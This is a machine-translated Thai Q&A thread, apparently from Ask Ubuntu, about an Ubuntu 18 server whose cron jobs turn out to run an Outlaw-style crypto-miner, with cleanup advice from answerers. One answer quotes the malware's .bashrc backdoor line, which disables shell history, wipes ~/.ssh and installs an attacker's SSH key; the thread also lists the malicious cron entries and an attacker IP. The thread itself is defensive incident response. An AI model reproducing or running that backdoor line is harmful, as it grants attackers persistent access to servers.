Strange Cron Job ใช้ CPU Ubuntu 18 LTS 100%

21

ฉันยังคงได้รับงาน cron ฝายปรากฏขึ้นและฉันก็ไม่รู้ว่าพวกเขาทำอะไร ฉันมักจะออก kill -9 เพื่อหยุดพวกเขา พวกเขาใช้ CPU ของฉัน 100% และสามารถทำงานได้หลายวันจนกว่าฉันจะตรวจสอบ ไม่มีใครรู้ว่าสิ่งนี้หมายความว่าอย่างไร

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

ฉันกำลังใช้งานเซิร์ฟเวอร์ Ubuntu 18 LTS ล่าสุดแล้วเมื่อวันที่ 7/24/2019

UPDATE

ฉันขอขอบคุณข้อเสนอแนะทั้งหมด ฉันยกเลิกการเชื่อมต่อข้อมูลและไดรฟ์แอปพลิเคชันทั้งหมดเนื่องจากสิ่งเดียวที่ได้รับผลกระทบคือไดรฟ์ระบบปฏิบัติการฉันอย่างน้อยก็ทำสิ่งนั้นอย่างถูกต้อง ฉันจะสร้างใหม่อย่างสมบูรณ์พร้อมความปลอดภัยมากขึ้นและวิธีการที่ปลอดภัยยิ่งขึ้น

server  cron  rsync 
MCP_infiltrator
แหล่งที่มา
8
.firefoxcatcheอาจจะไม่มีอะไรเกี่ยวข้องกับ firefox - นี่อาจเป็นนักขุด bitcoin หรือไม่? ลองอัปโหลดไฟล์ที่เรียกทำงานไปยัง virustotal
Thom Wiggers
1
ไฟล์ที่ดำเนินการโดย crontab นั้น/root/.firefoxcatche/a/updและ/root/.firefoxcatche/b/sync
Thom Wiggers
2
"ฉันไม่สามารถหา crontab เพื่อแฮช" สิ่งนี้หมายความว่าอย่างไร เหตุใดsudo crontab -eการแก้ไขจึงไม่ทำงาน แต่ถ้านี่เป็น cryptominer คุณไม่ได้ติดตั้ง ... มันจะถูกเพิ่มเข้าไปใหม่ ดูครั้งแรกใน "/root/.firefoxcatche/a/upd" สิ่งที่มันทำ
Rinzwind
2
"ฉันต้องเข้าสู่ระบบในฐานะที่เป็นรูทเพื่อไปที่นั่นหรือไม่" นี่เป็นคำถามที่ฉันไม่คาดหวังที่จะเห็นจากผู้ดูแลระบบ คุณจำเป็นต้องรู้จริงๆว่าคุณกำลังทำอะไรต่อจากนี้ไป เปลี่ยนรหัสผ่านผู้ดูแลระบบโดยเร็ว ตรวจสอบไฟล์ที่อยู่ใน cron กำจัดพวกเขา
Rinzwind
1
แต่มันก็ง่าย ;-) ฉันรักษาอินสแตนซ์ Google Cloud มากกว่า 10 ตัว ด้วยแผนฉุกเฉินในสิ่งที่ฉันสามารถจินตนาการผิดไป หากสิ่งนี้จะเกิดขึ้นฉันจะทำลายอินสแตนซ์รูทให้สร้างอันใหม่สแกนดิสก์ข้อมูลจากโคลนสแกนความแตกต่างแล้วแนบกับอินสแตนซ์ และใช้บางสิ่งบางอย่างเพื่อดักจับบุคคลนี้เพื่อป้องกันไม่ให้เกิดขึ้นอีกครั้ง ในกรณีของฉัน paycheck ของฉันขึ้นอยู่กับมัน ;-)
Rinzwind

คำตอบ:

40

เครื่องของคุณมีการติดเชื้อ crypto miner คุณสามารถเห็นคนอื่นรายงานชื่อไฟล์และพฤติกรรมที่คล้ายกันในการตรวจสอบในชีวิตจริงของเครื่องเสมือนใน Azure กับศูนย์รักษาความปลอดภัย ดูเพิ่มเติมที่Ubuntu Server ของฉันมีไวรัส ... ฉันหามันแล้ว แต่ฉันไม่สามารถกำจัดมันได้ ...ใน Reddit

คุณไม่สามารถเชื่อถือเครื่องได้อีกต่อไปและควรติดตั้งใหม่อีกครั้ง ระวังการกู้คืนข้อมูลสำรอง

ทอมวิกเกอร์ส
แหล่งที่มา
8
ฉันเห็นด้วย. รหัสผ่านรูทได้รับอันตรายดังนั้นติดตั้งใหม่และระมัดระวังการสำรองข้อมูล; มันอาจจะอยู่ที่นั่น
Rinzwind
9

เครื่องของคุณติด crypto miner attack ฉันยังต้องเผชิญกับการโจมตี ransomware ที่คล้ายกันในอดีตและฐานข้อมูลของฉันถูกบุกรุก ฉันใช้ SQL ดัมพ์สำหรับเครื่องและทำซ้ำเครื่องอีกครั้ง (เนื่องจากเครื่องของฉันคือ VM ที่โฮสต์บน AWS EC2) ฉันยังแก้ไขกลุ่มความปลอดภัยของเครื่องเพื่อล็อคการเข้าถึง SSH และรหัสผ่านที่แก้ไข ฉันเปิดใช้งานการบันทึกเพื่อบันทึกข้อความค้นหาและส่งออกเป็น S3 ทุกคืน

beingadityak
แหล่งที่มา
4

เกิดขึ้นกับฉันและฉันสังเกตเห็นเมื่อวานนี้ ฉันตรวจสอบไฟล์/var/log/syslogและ IP นี้ (185.234.218.40) ดูเหมือนว่าจะทำงานโดยอัตโนมัติ cronjobs

ฉันตรวจสอบแล้วในhttp://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) และมีรายงานบางส่วน ไฟล์เหล่านี้ถูกแก้ไขโดยโทรจัน:

  • .bashrc
  • .ssh / authorized_keys

ฉันพบสิ่งนี้ในตอนท้ายของ.bashrc(ซึ่งจะถูกดำเนินการในแต่ละครั้งที่มีการเปิดทุบตี):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

เป็นการลบauthorized_keysไฟล์ของคุณซึ่งเป็นรายการของคีย์ SSH ที่ได้รับอนุญาตให้เชื่อมต่อโดยไม่มีรหัสผ่าน จากนั้นจะเพิ่มคีย์ SSH ของผู้โจมตี:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

นอกจากนี้ฉันพบโฟลเดอร์นี้: /tmp/.X13-unix/.rsyncที่มัลแวร์ทั้งหมดอยู่ที่ไหน ฉันพบไฟล์/tmp/.X13-unix/.rsync/c/ipหนึ่งไฟล์ซึ่งมีที่อยู่ IP 70,000 รายการซึ่งส่วนใหญ่เป็นเหยื่อหรือเซิร์ฟเวอร์โหนด

มี 2 ​​วิธีแก้ไข: A:

  • เพิ่มไฟร์วอลล์ที่บล็อกการเชื่อมต่อขาออกทั้งหมดยกเว้นพอร์ต 22 และอื่น ๆ ที่คุณพบว่าจำเป็นและเปิดใช้งาน fail2ban โปรแกรมที่ห้ามที่อยู่ IP หลังจาก X พยายามรหัสผ่านล้มเหลว

  • ฆ่างาน cron ทั้งหมด: ps aux | grep cronจากนั้นฆ่า PID ที่ปรากฏขึ้น

  • เปลี่ยนรหัสผ่านของคุณเป็นรหัสที่ปลอดภัย

B:

  • สำรองไฟล์หรือโฟลเดอร์ใด ๆ ที่คุณต้องการหรือต้องการ

  • รีเซ็ตเซิร์ฟเวอร์และติดตั้ง Ubuntu ใหม่หรือสร้างหยดใหม่โดยตรง

    อย่างที่ Thom Wiggers กล่าวว่าคุณเป็นส่วนหนึ่งของบ็อตเน็ตการขุด bitcoin และเซิร์ฟเวอร์ของคุณมีแบ็คดอร์ แบ็คดอร์ใช้ประโยชน์จาก perl ซึ่งเป็นไฟล์ที่อยู่ที่นี่: /tmp/.X13-unix/.rsync/b/runมีสิ่งนี้ ( https://pastebin.com/ceP2jsUy )

โฟลเดอร์ที่น่าสงสัยที่สุดที่ฉันพบคือ:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (ซึ่งแก้ไขแล้ว)

  • ~/.firefoxcatche

ในที่สุดก็มีบทความเกี่ยวกับ Perl Backdoor ที่นี่: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

ฉันหวังว่าคุณจะพบว่ามีประโยชน์นี้

Oqhax
แหล่งที่มา
ฉันเช็ดไดรฟ์ระบบปฏิบัติการและติดตั้ง Ubuntu ใหม่อีกครั้งสร้างรหัสผ่านใหม่ที่ค่อนข้างยาวและคีย์ ssh ใหม่
MCP_infiltrator
ใช่นั่นเป็นวิธีแก้ปัญหาที่ดี :)
Oqhax
นี่เป็นคำตอบที่มีประโยชน์มาก - ขอบคุณสำหรับความจริงที่~/.bashrcได้รับการแก้ไข ฉันพบว่าการฆ่าปลอมผมมีปัญหาrsync kill -9 <pid>
Benny Hill
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.